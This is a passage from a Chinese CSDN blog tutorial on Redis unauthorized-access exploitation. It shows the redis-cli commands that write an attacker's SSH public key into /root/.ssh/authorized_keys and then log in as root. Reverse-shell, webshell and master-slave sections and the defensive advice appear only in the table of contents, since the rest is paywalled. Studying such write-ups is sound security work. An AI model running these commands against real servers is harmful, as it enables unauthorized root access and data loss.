redis_未授权访问

已于 2022-09-22 16:03:48 修改
阅读量8.1k 收藏 14
点赞数 2
分类专栏: 中间件漏洞 文章标签: redis web安全
于 2022-01-13 10:54:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36375207/article/details/122469295
版权
本文详细介绍了Redis未授权访问的情况,包括查看服务器信息、上传SSH密钥登录、尝试写入反弹shell以及直接写入shell脚本的方法。同时,文章强调了主从复制模式下的安全问题,并列举了多种防御措施,如关闭6379端口、设置密码登录、限制运行权限及禁用高危命令。
摘要由CSDN通过智能技术生成

目录

前言

搭建redis

未授权访问

1.查看服务器信息  info

 2.上传ssh密钥登录

2.1创建公钥私钥,将公钥写入本地文件

2.2 将公钥发送到对方服务器

 2.3利用redis-cli写配置的方式将公钥写入ssh目录

2.4 利用私钥远程登录redis的22端口

3.定时任务写入反弹shell(此方法在ubuntu中因无法忽略乱码导致失败)

3.1在redis中写入定时任务

3.2在攻击机上监听888端口等待反弹shell

4.直接写入shell脚本

4.1 redis写入shell

4.2 访问网站下的1.php

5.主从getshell

5.1 主从介绍

5.2复现

总结

防御方式

1.关闭6379

2.设置密码登录

3.服务器以低权限运行redis服务

4.禁用高危命令

参考

前言

        redis是一个开源的存储系统,支持数据的持久化存储、支持key-value、list、set等数据结构存储,支持备份。

        但若redis存在未授权访问,就会导致攻击者可以无需认证就能访问redis内部资源,获取敏感文件,甚至执行flushall清空数据,给root账户写入ssh公钥直接远程登录目的服务器。

影响版本:2.x、3.x、4.x、5.x

搭建redis

参考Linux下安装Redis_浅末年华的博客-CSDN博客_linux安装redis

安装redis客户端redis-cli

apt install redis-cli

未授权访问

安装好redis客户端以后,直接连接远程服务器redis-cli -h http://.....

成功登录远程redis

1.查看服务器信息  info

 2.上传ssh密钥登录

2.1创建公钥私钥,将公钥写入本地文件

在攻击机上输入ssh-keygen  -t  rsa,会创建id_rsa私钥和id_rsa.pub公钥

(echo "\n\n";cat /root/.ssh/id_rsa_pub)>test.txt

使用\n避免和其他redis缓存数据混合

2.2 将公钥发送到对方服务器

首先将公钥发送到redis的缓存中

cat  test.txt | redis-cli -h xx.xx.xx.xx -x set hello

 2.3利用redis-cli写配置的方式将公钥写入ssh目录

config set dir /root/.ssh    # 设置redis的备份路径为/root/.ssh/
config set dbfilename authorized_keys    # 设置保存文件名为authorized_keys
save    # 将数据保存在目标服务器硬盘上

2.4 利用私钥远程登录redis的22端口

ssh  -i  /root/.ssh/id_rsa  root@xx.xx.xx.x

最低0.47元/天 解锁文章
scu_hacker
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)POC
09-29
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)exploit Celery 版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在授权访问问题...
redis授权访问漏洞(三种方法)
网安小白的博客
08-30 5597
redis授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
Redis授权访问
weixin_63960760的博客
08-29 1086
redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。
Redis授权访问
最新发布
h1008685的博客
07-26 1099
redis授权访问,危险的配置项,redis常用操作,redis漏洞环境配置,写入定时任务进行反弹连接,ssh密钥登录,redis写入公钥文件进行登录,redis漏洞寻找[公网]
redis授权访问
weixin_65219040的博客
06-18 9351
redis
api.rar_Token 使用redis_django_exclaimedthp_redis_roselgr
09-24
Token是一种身份验证机制,用于确保只有经过授权的用户可以访问特定的API资源。在前后端分离的应用中,它通常代替Cookie进行会话管理,因为Token更适合跨域访问且不易受到CSRF(跨站请求伪造)攻击。 接下来,我们...
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
redis_desktop
01-13
9. **安全性**:在进行远程连接时,确保使用安全连接(SSL/TLS),并使用强密码保护,以防止授权访问。 10. **版本更新**:软件版本0.9.99可能较旧,用户应定期检查更新,以获取最新的功能和安全修复。 11. **...
redis授权访问漏洞
热门推荐
jiji_king的博客
07-07 1万+
个人笔记
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 3454
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
Redis 授权访问
qq_61553520的博客
05-17 548
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问等,Redis服务将会暴露到公网上,以及在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下进行授权访问Redis
授权访问漏洞-Redis授权访问漏洞
HAKUNAMATATATTA的博客
11-29 3839
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导 致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。Redis 是完全开源免费的,一个灵活的高性能 key-value 数据结构存储,可以用来作为数据库、缓存和消息队列。
Redis授权访问漏洞
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用程序和数据造成极大的安全风险。 攻击者通常会利用一些特定的工具或者脚本进行扫描,寻找处于授权状态的Redis服务。这些工具会自动化地进行扫描并利用默认口令或弱口令进行暴力破解,从而获取服务器权限。 为了避免Redis授权访问漏洞的发生,建议管理员在使用Redis时,采取以下措施: 1. 禁止公网访问:将Redis服务器部署在内网中,并禁止对公网开放访问。 2. 修改默认口令:使用较为复杂的口令,并定期更换口令。 3. 启用身份验证:启用Redis的身份验证功能,只允许已授权的用户访问。 4. 定期更新补丁:及时更新Redis安全补丁,以修复已知漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值